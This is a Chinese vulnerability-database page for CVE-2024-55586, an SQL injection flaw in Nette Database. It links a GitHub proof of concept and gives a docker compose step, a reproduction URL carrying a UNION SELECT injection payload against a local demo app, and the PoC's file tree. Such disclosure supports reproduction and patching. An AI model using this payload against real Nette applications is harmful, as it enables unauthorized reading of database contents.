漏洞平台

POC详情： 443e2ad1368fad64a662163422345a2fa919dfac

来源

https://github.com/CSIRTTrizna/CVE-2024-55586

关联漏洞

标题： Nette Database 安全漏洞 (CVE-2024-55586)
描述：Nette Database是Nette开源的一个具有熟悉的 PDO 类 API 但功能更强大的数据库层。 Nette Database 3.2.4及之前版本存在安全漏洞，该漏洞源于存在SQL注入漏洞，导致攻击者可以通过构造恶意的SQL语句来操纵数据库的查询逻辑。

介绍

Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/?id%3d1)+UNION+SELECT+2,version()+FROM+test+WHERE+(1=1```

文件快照


 [4.0K]  /data/pocs/443e2ad1368fad64a662163422345a2fa919dfac
├── [4.0K]  demo
│   ├── [ 529]  Dockerfile
│   └── [4.0K]  src
│       ├── [4.0K]  app
│       │   ├── [ 655]  Bootstrap.php
│       │   ├── [4.0K]  Core
│       │   │   └── [ 349]  RouterFactory.php
│       │   ├── [4.0K]  Model
│       │   │   └── [ 625]  TestFacade.php
│       │   └── [4.0K]  UI
│       │       ├── [ 486]  @layout.latte
│       │       └── [4.0K]  Test
│       │           ├── [ 761]  all.latte
│       │           └── [ 611]  TestPresenter.php
│       ├── [ 832]  composer.json
│       ├── [ 53K]  composer.lock
│       ├── [4.0K]  config
│       │   ├── [ 202]  common.neon
│       │   └── [ 146]  services.neon
│       ├── [ 269]  index.php
│       └── [1.6K]  readme.md
├── [ 704]  docker-compose.yml
├── [4.0K]  postgres
│   └── [ 115]  init.sql
└── [ 175]  README.md

9 directories, 16 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。